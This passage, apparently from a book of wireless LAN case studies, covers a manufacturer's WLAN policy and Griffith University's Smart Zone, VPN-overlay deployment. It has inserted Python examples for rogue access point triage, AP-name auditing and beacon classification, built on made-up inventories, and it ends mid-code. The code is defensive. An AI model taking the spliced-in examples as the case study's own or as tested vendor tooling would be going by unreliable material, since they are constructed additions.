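The comparison that matters for the business case is the laptop-with-WLAN group against the laptop-without-WLAN group, because it isolates the WLAN from the effect of simply owning a laptop; the no-laptop group serves as a sanity check on the baseline.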

Technology Considerations
The architecture for the WLAN was initially based on three components:
Security
Coverage
Throughput

Security
As the chief technical concern, security had to be addressed to meet the existing company policy on
wireless technologies. As a precaution before the WLAN project kickoff, the company instituted a
moratorium on WLAN use. This proved to be well founded because security standards for WLANs
continued to evolve.
The security architecture was built on the Cisco SAFE Blueprint. As is good practice, decisions related to
security were based on a risk assessment. Each deployment (that is, site) required a local policy based
on the findings of this assessment and business needs. This then led to a more formal practice where a
policy could be enforced. Each policy was built on four factors:
Threat analysis: What the potential threat is and what damage an exploit could cause, typically
measured in financial losses.
How to secure: Which types of security would or would not be allowed.
What to encrypt: What value the information being protected holds.
Which IP policy to use: Whether the IP addresses used would be public (routable) or not.

Note
You can find more information about Cisco SAFE, including the white paper, "SAFE: Wireless
LAN Security in Depth - version 2," at http://www.cisco.com/go/safe.

The actual design employed throughout the enterprise was in line with the published Cisco
recommendations. This included the Lightweight Extensible Authentication Protocol (LEAP) with Wired
Equivalent Privacy (WEP) and dynamic key rotation, migrating over time to LEAP with Cisco Key
Integrity Protocol (CKIP). The support infrastructure for authentication and validation was provided
through the use of Cisco Access Control Server (ACS) and the company's Lightweight Directory Access
Protocol (LDAP) services. Each system was strategically placed local to where the deployed services
would be installed.

Coverage
The intent of the WLAN was to give access only where it might be most used. The company culture
directed this approach. This meant that during the initial deployment, not all areas in the office facilities
were provided with WLAN coverage. Coverage was limited to conference rooms or other group meeting
areas (for example, cafeterias). The deployment up to this point was successful because the company
policy and culture did not encourage extended use of the WLAN for network access. The technology,
however, has since seen widespread adoption at all levels and functions of the employee chain. This desire
for ubiquitous wireless access has changed the WLAN from a convenience to a required
service, resulting in an enterprise-wide deployment.
Even with this change in direction, the design was focused on providing proper coverage as opposed to
providing a fixed throughput. Today, the WLAN-enabled areas remain unchanged (emphasis and
priority are given to more formal meeting areas), but the general office population receives the service as
a byproduct of the signal bleeding into other areas.

Note
The entitlement of wireless and mobile devices such as laptops and PDAs is not ubiquitous in
the enterprise.

The company's direction is that the WLAN will not be a replacement for the wired office. It is simply an
overlay network of convenience. Furthermore, no compelling argument has ever been made to support
the need for roaming; therefore, WLANs are confined to "roaming domains" such as a factory or single
building.
Factories, however, do have additional conditions to meet, primarily the need for dynamic modification of
the physical layout on the factory floor. This condition drove the need for more flexible designs and
installations. The WLAN in the factory had to support an environment with physical churn. Physical
layout changes occur to the point where changing the traditional wired infrastructure would become cost-prohibitive. In essence, within the factory, the WLAN became a replacement for traditional wired access.
A constant hurdle in the factory and warehouse is that they are typically filled with wireless obstacles.
Factories tend to be filled with large metal machines that perform specialized functions such as
processing and metal machining through the use of robotics. This fact alone made the effects of
multipath, attenuation, and interference very serious factors to contend with. Certain systems on the
factory floor could also be hampered by the WLAN (RF interference on existing systems) because they,
too, operated in the unlicensed 2.4-GHz band, although they were not tied to the 802.11 protocol. To
overcome these hurdles, one key difference in the factory design was the use of directional
antennas.

Throughput
Several factors came into effect concerning the throughput over the WLAN:
Policy
Cost
Coverage
Mobility did not dictate the use of WLANs, and as we previously mentioned, the culture did not
encourage the use of WLANs. Today, and like other companies, the change in work behaviors from
"heads down" to more "open collaboration" has since changed the stance (policy) that the company
takes toward mobility in the workplace.
Even though WLANs are becoming more of an accepted enabling technology, the cost still needed
significant justification. The cost of the infrastructure in an environment where WLANs were initially not
used as a primary access method to the network meant that strategic placement was done in a manner
where "the most bang for the buck" could be realized.
Both policy and cost forced the IT organization to provide maximum coverage (versus highest
throughput) with a minimal investment in infrastructure. This design dictated that data rate shifting be
allowed because it lets users associate with the WLAN from greater distances at the expense
of throughput.
As a result (either directly or indirectly), performance and availability issues arose. It has been shown
that allowing for dynamic changes in the WLAN (data rate shifting) in an often-unpredictable medium
can become counterproductive in the long run. This practice might change in the future.

Deployment
The deployment was handled primarily by internal resources. This method was aided by the fact that the
deployment was limited, but additionally it worked as a catalyst to build awareness, ownership, and skills
within the team. In the general deployment, the only aspect that was handled outside of the company
was the cabling. The local IT team did site surveys, installation, and configuration. The exception was
factories, where professional third-party companies were employed for site surveys.

What the Future Holds


Enterprises often initially struggle with the added financial burden of deploying, managing, and operating
WLANs; over time, their growing dependence upon the service makes it unacceptable to have
interruptions. What initially begins as an overlay network becomes a top priority when broken because of
the sheer number of employees relying on the WLAN. In the future, as services grow in demand or as
advanced technologies are added onto the original WLAN architecture, the company will wrestle with the
growing need for access and the subsequent financial challenges.
Now that the WLAN is finding its way into the general office population, the need for additional services
such as guest access and voice is becoming part of the general architecture. Being highly security-conscious, the company must also identify a mitigation plan for rogue device detection.

Guest Access
At present, the company does not provide guest access as a common practice. Much of the need did not
exist initially, but as the market adoption starts to climb, this added-value service becomes more
realistic. The company sees the use of guest access not only as a convenience but also as an additional
layer of security.

Voice over IP
Today, the company is currently adopting Cisco VoIP to offset climbing telephony costs and to take
advantage of business-enabling applications and services that can be provided through a converged
solution. One of the VoIP technologies used is Cisco IP Communicator, which is the software-based
solution that makes the PC a fully functional IP phone. Over time, the wireless-enabled PC will need to
be supported by a voice-enabled WLAN.
Many challenges lie ahead for this company when it comes to delivering a voice-enabled WLAN. Issues
about telemetry and location services that allow a phone to be located in case of emergency will be a
major focal point. Most important, the re-architecture of the WLAN to support better throughput, quality
of service (QoS), and roaming (both Layer 2 and Layer 3) will need to be completed to support applications
and services that continue to emerge.

Rogue Access Point Detection


Rogue APs come in two flavors: those that are friendly and those that are not. Friendly rogues are not
malicious, but they are also not wanted. Unfriendly rogues are considered malicious and are not wanted.
Without a plan in place to identify either kind, the company has no mitigation option available. Additional
work is being carried out to manage the threat of rogues in the enterprise. The variety of tools and
management systems on the market today are being evaluated to address this issue.
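The section above makes the point that without a way to tell managed, friendly, and unfriendly rogues apart there is nothing to act on. The following added example (not the manufacturer's tooling or the book's own code) shows the minimal triage logic such a plan needs, run over a constructed scan. The inventory, SSIDs and BSSIDs are made up, and the classification rule is an assumption: an unknown AP that advertises a corporate SSID or is reachable on the corporate wired LAN is treated as unfriendly, while any other unknown AP (typically a neighbour) is a friendly rogue that is logged but not escalated.

```python
"""Rogue AP triage over a constructed scan.

Added example; not the manufacturer's tooling or the book's own code.
Inventory, SSIDs, BSSIDs and the classification rule are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ObservedAP:
    bssid: str
    ssid: str
    rssi_dbm: int
    on_corporate_wired_lan: bool  # assumption: filled by a wired-side MAC/switch-port check


# Constructed inventory of APs the company itself installed (BSSID -> site)
MANAGED_APS = {
    "00:1a:2b:3c:4d:01": "factory-east",
    "00:1a:2b:3c:4d:02": "office-conference-2",
}
CORPORATE_SSIDS = {"corp-wlan", "corp-factory"}

# Recommended handling per category; the page gives no concrete runbook,
# so these are assumed defender actions.
ACTIONS = {
    "managed": "none",
    "friendly": "log, notify owner, confirm it has no wired connection",
    "unfriendly": "alert SOC, locate the device, disable its switch port if wired",
}


def classify(ap: ObservedAP) -> str:
    """Return 'managed', 'friendly' or 'unfriendly' for one observed AP."""
    if ap.bssid.lower() in MANAGED_APS:           # BSSID comparison is case-insensitive
        return "managed"
    if ap.ssid in CORPORATE_SSIDS or ap.on_corporate_wired_lan:
        return "unfriendly"                        # impersonation or an unauthorised bridge
    return "friendly"                              # unknown but not touching our network


def triage(scan):
    """Group a scan by category; each entry is (bssid, ssid, rssi_dbm, action),
    strongest signal first so the closest device is investigated first."""
    report = {"managed": [], "friendly": [], "unfriendly": []}
    for ap in scan:
        cat = classify(ap)
        report[cat].append((ap.bssid.lower(), ap.ssid, ap.rssi_dbm, ACTIONS[cat]))
    for entries in report.values():
        entries.sort(key=lambda e: -e[2])
    return report


# Constructed scan results, as a wireless scanner might report them
SAMPLE_SCAN = [
    ObservedAP("00:1a:2b:3c:4d:01", "corp-factory", -48, False),
    ObservedAP("00:1A:2B:3C:4D:02", "corp-wlan", -55, False),        # same AP, upper-case BSSID
    ObservedAP("aa:bb:cc:00:00:01", "corp-wlan", -70, False),        # SSID impersonation
    ObservedAP("aa:bb:cc:00:00:02", "linksys", -40, True),           # unauthorised AP on our wire
    ObservedAP("aa:bb:cc:00:00:03", "NeighbourCafe", -82, False),    # neighbour, not ours
]

if __name__ == "__main__":
    for cat, entries in triage(SAMPLE_SCAN).items():
        for bssid, ssid, rssi, action in entries:
            print(f"{cat:10} {bssid} {ssid:14} {rssi:4} dBm -> {action}")
```

The wired-side check is what separates the two rogue classes in practice: an unknown AP seen only over the air may be a neighbour, but one whose MAC also shows up on a corporate switch port is a bridge into the network regardless of the SSID it advertises.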

Summary
The manufacturing company examined in this case study uses WLANs to improve productivity (office)
and business process (factory). Like many companies that adopt technologies early, the financial
restrictions and company culture that existed forced the deployment to be limited in scope and scale.
The due diligence done in the discovery and initial deployment proved successful in driving the
acceptance of WLAN as a viable and financially justifiable solution. In addition to having to work within
financial limitations, the company was challenged with finding a solution that could provide a sufficient
level of security. A WLAN also proved beneficial in the factory by helping to reduce cost and allow for
flexibility. Looking forward, further uses of the WLAN, such as voice and RFID, continue to be examined.

Chapter 12. Education Case Study

Opened in 1975 to the south of Brisbane, Griffith University specializes in Australian environmental
studies, humanities, modern Asian studies, and science, with the addition of recently opened medical
and dental schools. Serving a demographic area comprising the Brisbane-Logan-Gold Coast corridor,
the university opened a new $38 million campus at Logan City in the late 1990s. Today it has
approximately 40,000 staff and students across five campuses. Over the years, Griffith University has
demonstrated a capacity to innovate continually while adapting to change and has acquired an enviable
national and international reputation. It is now considered one of Australia's most progressive and
dynamic tertiary institutions (known as higher-education institutions in the United States). The
university's five campuses are situated on the Brisbane-Logan-Gold Coast corridor of southeast
Queensland, the fastest growing region of Australia.
Universities, by their very nature, tend to be vibrant and progressive environments. Young people, and
especially those engaged in higher education, typically embrace technology, new media, and IT services.
To satisfy this social dynamic and to address other more tangible business requirements, Griffith
University decided in early 2004 to deploy wireless networks in targeted areas. Adopting a phased
deployment process, the Network and Communication Services group chose to nominate "Smart Zones,"
which are specific areas where WLAN connectivity was provided with a high degree of stability, with a
service-oriented design philosophy.

Note
Network and Communication Services is a work unit of 18 staff responsible for the design,
procurement, implementation, operation, and maintenance of all aspects of the Griffith
University voice and data network. Included within this network are a Smithsonian Medal-winning private wide-area network, a 13,000-port data network spanning the five campuses,
and a voice network of 7,000 handsets.

The development of an inclusive and wide-ranging web portal, named Wireless@Griffith, was
instrumental in achieving the success of the solution. Today, less than two years after the initial planning
stages began, the adoption rate has proven higher than expected, and the popularity and real-world
benefits of the solution are tangible. Student satisfaction is greater, the WLAN is highly used, the need
for dedicated wired computer labs has been reduced, and the university boasts an impressive and
progressive online campus in line with its reputation as a trendsetter in the Australian educational sector.

Business Model
The primary business case for Griffith University's enterprise-class WLAN was to provide increased IT
services, reduce the load on existing computing labs, and supplement existing wired network
infrastructure. There was a vocal request from academic staff for wireless services and a strong desire to
take advantage of the mobility benefits offered by the technology. Most faculty were already equipped
with laptops, and many had personal PDAs, both of which were often used for academic activity and staff
productivity services.
Furthermore, extensive research, including large-scale student surveys, showed that more than 50
percent of students owned and used laptop computers. Many of these laptops were already fitted with
wireless connectivity, and most students stated a strong desire and support for university-provided
wireless service.
Adoption has been very high among the student body, followed marginally by the academic body. All
network and IT services are available through the WLAN, which is effectively only an alternative
transport medium. It removes the need for users to find a desk and Ethernet port, therefore extending
connectivity and access to the users' locations and not limiting their ability to use IT services to specific
localities.

Architectural Principles
The model Griffith chose for its underlying wireless coverage maps was quite different from that of many
other universities. Whereas other educational deployments have typically opted for blanket coverage,
Griffith chose to provide connectivity only in specific Smart Zones, for several reasons.
Smart Zones allowed the IT group to dissuade faculty members from using wireless within their staff
offices, where they already have 100-Mbps switched cabling. "Most staff do not understand that wireless
is a shared medium technology," says David Renaud, wireless network support engineer at the
university, "and is not meant to be a replacement to the wired infrastructure, but as a complementary
technology to be used in specific Smart Zones."
Figure 12-1 shows the Smart Zone, shaded in gray, where wireless coverage is provided in one of
Griffith's campus buildings. Coverage maps, such as this one, are made available on the
Wireless@Griffith portal, allowing university students and staff to check service areas at any time.

Figure 12-1. Smart Zones

Reprinted with permission of Griffith University


Equally important, by providing coverage in specific Smart Zones only, users were guaranteed a quality
service. Signal strength and coverage are guaranteed in the Smart Zones. Although students and staff
might be able to access the WLAN outside of the coverage areas, they can experience low data speeds
or connectivity problems. No IT support is offered to users and staff outside the Smart Zone. "By
adopting this model, all parties have a clear understanding as to where we will support users on
wireless," explains Renaud.
Griffith University makes the following service disclaimer on its web portal:
"The Wireless@Griffith service is only guaranteed within the shaded coverage areas on the maps. If
you are outside these coverage areas, you may still have network access, but you may also
experience problems with your wireless network connection. Unless you move into one of the
shaded coverage zones, we cannot ensure that you will receive service."
The Smart Zone model has proven very successful for the university. Satisfaction levels remain high
because the user population understands where connectivity is provided.

Topology
The IT staff at Griffith University opted for a simple architecture that would integrate seamlessly with
their existing security infrastructure. Choosing a simple, flat network with a single VLAN per geographical
campus also helped reduce the operational support overhead with easier troubleshooting and second- and third-level support. (You learn more about the university's three-tiered support system later in the
section "Service and Support.") Each campus VLAN in turn provides connectivity to a VPN concentrator only. Access
points are therefore isolated from the normal academic network, and access is possible only through
authenticated VPN sessions. Additionally, by limiting the number of VLANs to one per campus,
seamless inter-AP roaming is supported, with no loss of VPN session connectivity.
Figure 12-2 shows how the wireless LAN (shaded in light gray) and access points are isolated from the
production data network (shaded in darker gray) by the use of a VPN concentrator. Access to the
university network, servers, and services, and even the Internet, must go through the concentrator. This
design ensures that only authorized traffic ever traverses the university's network.

Figure 12-2. Typical Griffith University Campus

802.11 Wireless Networking Standards


Griffith standardized on the 802.11g protocol for its WLAN. This choice provided backward
compatibility with the older, more common 802.11b standard (also in the 2.4-GHz frequency range), and
it also offered higher speeds and increased throughput for client devices that supported 802.11g. It
should be noted that 802.11g access points "step down" to 802.11b speeds when 802.11b clients are
associated, so the full potential of this decision will not be realized until the majority of older 802.11b
clients are replaced by staff and students. The university actively works to maximize the number of
802.11g clients in use: on-campus computer stores stock Linksys 802.11g cards at competitive
rates, and David Renaud reports that many hundreds of cards were sold in the first six months of operation.
The university therefore encourages the use of 802.11g over the older 802.11b standard.
To reduce cost, the university initially chose not to adopt the 802.11a standard, which would have
required purchasing 802.11a radio modules for the university's access points. More recently, the newer-model access points come with 802.11a by default, and the university encourages users to utilize this
frequency band where possible.

Access Point Settings


The access points have been configured to allow a maximum of 15 concurrent sessions. The university
arrived at this figure based on the desire to provide connectivity to its users equivalent to or better than
cable/ADSL speeds. A primary architectural and business goal was to provide a quality service to users.
User perception of a high-quality service would most likely be influenced by connectivity and speed.
"Although 15 may be a smaller number than other institutions have," says Renaud, "we would rather cut
users off at 15, rather than risk the Wireless@Griffith service being perceived as slow and cumbersome."
Such a perception has been avoided by careful, proactive planning. In locations where traffic was
predicted to exceed 15 concurrent users, such as the large Gold Coast campus (where usage peaks
around 40 users in the only Smart Zone), more than one AP was installed; in this case, three access
points were deployed in one Smart Zone.
Furthermore, the minimum association rate has been set to 11 Mbps. This setting helps manage the size
of the cell and ensures that users will always enjoy high throughput. This careful, proactive planning has
ensured that a good level of service, or user experience, has been achieved. The emphasis on a quality
service has had a very positive effect on the solution's success.

Signal Strength, Antennas, and Outdoor Coverage


The signal strength is not limited on most access points, which allows greater coverage. The exception is
the university's South Bank campus, located in the commercial downtown area of Brisbane, a major
Queensland city. In this area, access points are configured with lower transmit power to reduce "leaking"
into nearby offices and public areas.
The IT group also uses external omnidirectional antennas, as well as 6-dBi and 12-dBi patch antennas,
to cover several outdoor spaces.

Radio Cell Architecture


Wireless users can "step down" to lower speeds the farther away they are from the access points, until
they reach 11 Mbps. The access points are configured to allow association at speeds of only 11 Mbps or
higher. This setup ensures a quality experience for users and provides more predictable cell sizes and
coverage zones.

Global Naming Standards


A global naming standard was adopted in line with the university's existing policies. This standard
ensures that second- and third-level support functions can easily identify the access points and quickly
resolve their locations during troubleshooting activities.
Details of the naming standard for APs follow:
<campus><building>[<room>]<device id><ap number>
This scheme is based upon the following values:
campus: An abbreviation of the campus name, such as na, mg, gc, lo, or sb.
building: The three-letter code assigned to the building by the Office of Facilities Management, such
as BUN or WCN.
room: The official university room number, such as 1.43c or 0.45. The dot is omitted from the
device name.
device id: A two- or three-letter code used to identify the equipment type. In this case, it is "ap"
for access point.
ap number: An integer value based upon the number of access points in each particular Smart
Zone.
An example device name would be nabcn213ap01. This name designates the first access point in room
213 of the BCN building in the Nathan campus.
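A naming standard is only useful to second- and third-level support if every device actually follows it, so it is worth being able to parse and audit names mechanically. The following is an added example, not Griffith's or Cisco's code: it parses names of the form <campus><building>[<room>]<device id><ap number> as described above. The campus codes and the two sample names (nabcn213ap01 and naasn003ap01) come from the case study; the assumptions that campus codes are exactly two letters, building codes exactly three, rooms three digits plus an optional letter, and the AP number two digits are mine, inferred from those samples.

```python
"""Parse and audit access point names that follow the case study's standard.

Added example (not Griffith University's or Cisco's code). Field widths
are an assumption inferred from the sample names on the page.
"""
import re

# Campus codes named in the case study; treated here as the full set (assumption).
CAMPUS_CODES = {"na", "mg", "gc", "lo", "sb"}

# Room numbers are written without the dot (1.43c -> 143c, 0.45 -> 045), so a
# room is three digits plus an optional letter suffix (assumption).
AP_NAME_RE = re.compile(
    r"^(?P<campus>[a-z]{2})"
    r"(?P<building>[a-z]{3})"
    r"(?P<room>\d{3}[a-z]?)?"
    r"(?P<device>ap)"
    r"(?P<number>\d{2})$"
)


def parse_ap_name(name):
    """Return the components of an AP name as a dict, or raise ValueError."""
    m = AP_NAME_RE.match(name.strip().lower())
    if not m:
        raise ValueError(f"{name!r} does not follow the naming standard")
    parts = m.groupdict()
    if parts["campus"] not in CAMPUS_CODES:
        raise ValueError(f"{name!r}: unknown campus code {parts['campus']!r}")
    parts["number"] = int(parts["number"])
    return parts


def build_ap_name(campus, building, number, room=None):
    """Build a conforming name (inverse of parse_ap_name); room may contain a dot."""
    room_part = room.replace(".", "").lower() if room else ""
    name = f"{campus.lower()}{building.lower()}{room_part}ap{number:02d}"
    parse_ap_name(name)  # round-trip check: raises if the inputs were bad
    return name


def audit_inventory(names):
    """Split an inventory into conforming names and problems found.

    A name that does not parse is a support risk: Tier 2 and Tier 3 staff
    cannot locate the device from its name during troubleshooting.
    """
    ok, problems = {}, {}
    for n in names:
        try:
            ok[n] = parse_ap_name(n)
        except ValueError as e:
            problems[n] = str(e)
    return ok, problems


if __name__ == "__main__":
    # Constructed inventory: two names from the case study plus two bad ones.
    sample = ["nabcn213ap01", "naasn003ap01", "xxbcn213ap01", "nabcn2.13ap1"]
    good, bad = audit_inventory(sample)
    for n, p in good.items():
        print(n, "->", p)
    for n, why in bad.items():
        print("PROBLEM:", why)
```

The audit is the part a support team would schedule: run it against the management system's device list after each deployment phase, and any name it rejects is a device that will be hard to find when a user reports a dead spot.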

Wireless Equipment
The university undertook a rigorous and detailed equipment evaluation and selection process. Bruce
Scott is the manager of the network and communications services group. His team created detailed
requirement specifications and evaluated 10 equipment manufacturers. After initial evaluation and
review, a short list of three vendors was created, and extended testing and review was undertaken. Each
vendor was asked to supply test access points and clients for the university's IT staff and laboratories.
Finally, the Cisco Aironet solution was adopted and the 1200 series access point selected. More recently,
the university has moved on to the newer 1131 model access point.

Network Management
Early on, the university identified the need for dedicated WLAN management capabilities. As such, and in
line with their selection of Cisco infrastructure, the IT staff selected and deployed the Cisco Wireless LAN
Solution Engine (WLSE), a dedicated wireless network management appliance. The WLSE provides the
university IT staff with visualization, configuration, and image management, dedicated wireless reporting
capabilities, and RF management features.
The Cisco WLSE is also used to provide graphical traffic and usage reports for the service portal, thereby
offering IT staff and users intuitive and friendly information on service availability and trends.
Additionally, because a VPN overlay plays a fundamental part in the solution, regular reporting is
undertaken for the following:
Total number of unique users on a monthly and cumulative basis
Total number of logons on a monthly and cumulative basis
Average VPN session time on a monthly and cumulative basis (varies between 60 and 100 minutes
per logon/session)
The university is also in the process of implementing a comprehensive network operations center that
will manage not only the wireless but also the wired network.

Service and Support


Griffith University's WLAN is supported by a three-tiered system, as described in this section.

Tier 1: Information Services


Tier 1 is the university's help desk. Part of the Information Services Division, it provides students and
staff with their first port of call when requesting assistance. This team provides basic troubleshooting,
including referring end users to the extensive solution web portal that encompasses comprehensive
FAQs and training material. Technical problems that cannot be handled at this level can be escalated to
Tier 2 support.

Tier 2: Element IT and Learning and Environment Department


Tier 2 support is segmented between staff and student support. Staff support is provided by Element IT,
and student support is provided by the Learning and Environment Department.
Element IT support provides detailed technical assistance to university staff on wireless issues and on
standard desktop and application support. This support includes remote desktop management where
appropriate. This group is also responsible for packaging the preconfigured VPN client in all staff laptops,
in line with the university's Standard Operating Environment (SOE).
The Learning and Environment Department provides daily in-person wireless support for students, which
can be booked through the Wireless@Griffith web portal. This support has proven integral to the success
of the rapid adoption by students, with hundreds of students training and configuring their laptops each
semester. For example, in one three-week period during early 2005, more than 500 students attended
training and laptop configuration sessions.
Complex or design-related issues can be escalated to Tier 3: Network and Communication Services.

Tier 3: Network and Communication Services


Tier 3 support is provided by the architects and engineers responsible for the solution. This group
includes dedicated WLAN support engineers, such as David Renaud, and is managed by Bruce Scott. Tier
3 support addresses problems escalated by Tiers 1 and 2, which are usually coverage problems or issues
relating to access point failures, difficult-to-troubleshoot interference problems, and the more complex
RF-based issues.

Client Management
Because of the straightforward yet secure architecture that Griffith adopted, client management has
been greatly simplified. By avoiding the use of specific Extensible Authentication Protocol (EAP)
mechanisms or encryption standards and adopting a secure VPN overlay, the WLAN can support many
different client types. No particular configuration is necessary. Each device must be capable of running
the university's Vlink VPN software client, which is available for Windows, Macintosh (Mac OS X), and
Linux operating systems. Limited support is also provided for PalmOS and Windows Mobile devices
through a third-party client utility. Because the university does not provide this software to users, it
must be purchased by those who want to use their PDAs wirelessly.
Additionally, the network and communications services team provides support for several particular
wireless cards and drivers, including those produced by Linksys, Apple, and Dell. Other nonsupported
clients can just as easily connect, as long as they can successfully use the Vlink VPN software, but the
university limits its official support to these clients. University computer stores sell Linksys wireless cards
to students who want to wirelessly enable their laptops.
The need for extensive client management is therefore avoided. User support and management are
handled through the solution's service portal, Wireless@Griffith, an internally developed intranet web
portal that provides extensive instructions, training material, and links to the various software clients.
Furthermore, the use of a "walled garden" ensures that users are automatically provided with access to
the VPN software clients. This setup avoids unnecessary support calls and helps reduce the operational
overhead borne by the network and communications services team. Any client that associates to the
WLAN and launches a browser is automatically redirected to the service portal, where the user can
download the VPN client. No further connectivity is possible until the user installs and uses the client.

Security and Rogue AP Detection


The university WLAN is secured through the use of a VPN overlay. This simple yet extremely secure
solution provides robust 128-bit AES-based security and data integrity. Standardizing on two 3000 series
Cisco VPN concentrators at different campus locations for redundancy, the WLAN requires users to install
and use a repackaged Cisco VPN client, renamed "Vlink" by the university's IT departments.
Each university student and faculty member is automatically provided with network credentials as part of
his normal day-to-day activity. These credentials are used extensively to authenticate the users for
everything from basic network access on the wired LAN to Internet access for billing purposes. The
WLAN leverages these preexisting credentials, and the VPN client and concentrators use them to validate
user identity. By using the same credentials, ease of use is increased, and users are not expected to
become familiar with a separate authentication framework.
Radio-based rogue AP detection is undertaken through the features of the Cisco WLSE. The WLSE
provides the IT staff (and upcoming NOC) with visualization and alert-based notification of potential
rogue APs.
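The comparison at the heart of radio-based rogue AP detection is simple: beacons heard by managed access points are matched against the list of BSSIDs the university owns, and anything unknown that advertises the campus SSID is an impostor that users might associate to in place of the real network. The following is an added example, not Griffith's code and not a description of how the Cisco WLSE implements the feature. The SSID, MAC addresses, channels and signal levels are all constructed; the two inventory names follow the case study's naming standard.

```python
"""Classify beacons heard by managed APs against an authorized inventory.

Added example; not Griffith University's code and not the WLSE's logic.
All identifiers below are constructed sample data.
"""
from dataclasses import dataclass

CAMPUS_SSID = "wireless-griffith-example"   # constructed; not the real SSID


@dataclass(frozen=True)
class Beacon:
    """One beacon frame as reported by a managed AP scanning the air."""
    bssid: str
    ssid: str
    channel: int
    rssi_dbm: int
    heard_by: str   # name of the managed AP that reported it


def normalize_mac(mac):
    """Canonical lower-case, colon-separated form so inventory and scan data compare."""
    return mac.strip().lower().replace("-", ":")


def classify_beacons(inventory, beacons, rssi_floor=-80):
    """Sort beacons into authorized, misconfigured, rogue and neighbor lists.

    inventory     : {bssid: (ap_name, configured_channel)} for managed APs.
    rogue         : unknown BSSID advertising the campus SSID. Always reported,
                    however weak, because users may associate to it.
    misconfigured : managed AP heard on a channel other than the one it was
                    configured with (an unplanned change worth a ticket).
    neighbor      : unknown BSSID with a foreign SSID, reported only above
                    rssi_floor; weaker ones are most likely off-campus.
    """
    known = {normalize_mac(b): v for b, v in inventory.items()}
    result = {"authorized": [], "misconfigured": [], "rogue": [], "neighbor": []}
    for b in beacons:
        bssid = normalize_mac(b.bssid)
        if bssid in known:
            name, channel = known[bssid]
            bucket = "authorized" if b.channel == channel else "misconfigured"
            result[bucket].append({"bssid": bssid, "ap": name,
                                   "channel": b.channel, "heard_by": b.heard_by})
        elif b.ssid == CAMPUS_SSID:
            result["rogue"].append({"bssid": bssid, "ssid": b.ssid, "channel": b.channel,
                                    "rssi": b.rssi_dbm, "heard_by": b.heard_by})
        elif b.rssi_dbm >= rssi_floor:
            result["neighbor"].append({"bssid": bssid, "ssid": b.ssid, "channel": b.channel,
                                       "rssi": b.rssi_dbm, "heard_by": b.heard_by})
    return result


# Constructed inventory: BSSID -> (AP name per the naming standard, configured channel)
INVENTORY = {
    "00:11:22:33:44:01": ("nabcn213ap01", 1),
    "00:11:22:33:44:02": ("naasn003ap01", 6),
}

# Constructed scan results, including a dash-separated MAC to exercise normalization.
SAMPLE_BEACONS = [
    Beacon("00-11-22-33-44-01", CAMPUS_SSID, 1, -45, "nabcn213ap01"),      # managed, as configured
    Beacon("00:11:22:33:44:02", CAMPUS_SSID, 11, -50, "nabcn213ap01"),     # managed, wrong channel
    Beacon("de:ad:be:ef:00:01", CAMPUS_SSID, 6, -60, "naasn003ap01"),      # impostor of campus SSID
    Beacon("de:ad:be:ef:00:02", "coffee-shop-guest", 11, -40, "naasn003ap01"),
    Beacon("de:ad:be:ef:00:03", "home-router", 1, -88, "naasn003ap01"),    # too weak to matter
]

if __name__ == "__main__":
    for bucket, items in classify_beacons(INVENTORY, SAMPLE_BEACONS).items():
        print(bucket, items)
```

The rssi floor is deliberately applied only to foreign SSIDs: a weak beacon copying the campus SSID is still worth an alert, because its signal is strong somewhere the scanning AP is not.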

Deployment and Implementation


Deployment of Griffith University's WLAN solution was undertaken on a phased basis. This approach
allowed the university's IT staff to validate the architecture from a technical and security basis, introduce
the services on an incremental basis, ensure that support staff were among the first to familiarize
themselves with and benefit from the solution, and finally avoid the "big bang" approach for service
introduction.
Careful site surveys were undertaken and cabling was laid before each access point was installed.
Finally, each Smart Zone was tested before being launched as a production service.

Deployment Phases
Phase One of the deployment concentrated on IT areas, cafes, outdoor locations, libraries, and learning
centers. The areas selected for Phase One were partly defined by the end users (see "Lessons Learned
and Recommendations" later) through proactive user surveys and requirements definitions.

Note
Learning centers are "computer labs on steroids," according to Scott. They are specialized
areas set aside for student study, research, and educational activity. Griffith University learning
centers typically house 90 desktop PCs in a large open area, with additional breakout rooms
and group study rooms available to students. Highly used and very popular, the learning
centers provide the students with a dedicated space within the university environment to
concentrate on their academic activities. They were a logical prime location for early
deployment.

Phase Two of the deployment added all seminar rooms and 80 percent of "bookable" teaching areas
(excluding the main lecture halls and laboratories). All staff meeting rooms and common rooms were
also included. This phase was only undertaken after the successful completion of Phase One; in other
words, the Network and Communications Services team addressed any problems that were identified
during Phase One before proceeding with more widespread deployment. Phase Two saw the extension of
WLAN coverage into teaching areas and greatly increased the "footprint" of the solution, with more than
150 additional access points deployed.
Phase Three of Griffith University's deployment addressed the lecture halls and scientific laboratories.
Only recently completed (late 2005), this phase adds to the coverage and extends the service into
practically all teaching areas. Nearly all outside areas where staff and students congregate are now
covered.
A planned fourth phase will be undertaken in. This phase will address dead spots identified by end users
and the Network and Communications Services team, in addition to remaining areas that were originally
deemed low priority. Phase Four will bring the university closer to ubiquitous coverage.

Site Survey
It pays to plan for capacity because as more and more students purchase laptops, providing
enough capacity will be critical.
David Renaud, Wireless Network Support Engineer
An independent vendor was appointed to undertake the site surveys and the installation and
configuration of the access points. The vendor was given detailed instructions and a template from which
to work. These instructions included the stipulation that a signal strength of at least 50 percent (when
measured by the Cisco Aironet Client Utility) was required at all locations within the Smart Zone.
Compliance was verified by taking four signal strength measurements at the extreme edges of the
Smart Zone. Where coverage problems occurred, external high-gain antennas were used.
Figure 12-3 shows the location of access point naasn003ap01 in a project room. The four black circles
mark the locations where Griffith IT staff measured signal strength to ensure that it met the 50 percent
benchmark.

Figure 12-3. Validating Signal Strength

Reprinted with permission of Griffith University

Some general guidelines have been adopted over the course of the deployment phases. These
guidelines, based upon environmental factors and the nature of university buildings, offer further
direction during the site survey process:
For buildings that have internal concrete walls, there is one access point per room.
For buildings that have internal Gyprock (plasterboard) walls, there is one access point per two to
three rooms. However, this is largely determined by the capacity (in terms of potential users) of
the rooms, as detailed earlier. If more than 15 concurrent users are expected, more access points
are used.
For soundproof rooms and laboratories, access points are mounted inside an AV cabinet or in an area
where the signal will pass through a glass window into such a room.
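The survey rules above (four edge measurements of at least 50 percent, no more than 15 concurrent users per access point, one AP per room behind concrete and one per two to three rooms behind plasterboard) are easy to encode so that every proposed Smart Zone gets the same check before installation. The following is an added example, not Griffith's or the survey vendor's tooling. The sample zones are constructed; the first mirrors the Gold Coast figures on the page (a peak of about 40 users served by three APs). Treating plasterboard as three rooms per AP, rather than two, is my assumption.

```python
"""Check a Smart Zone plan against the case study's survey rules of thumb.

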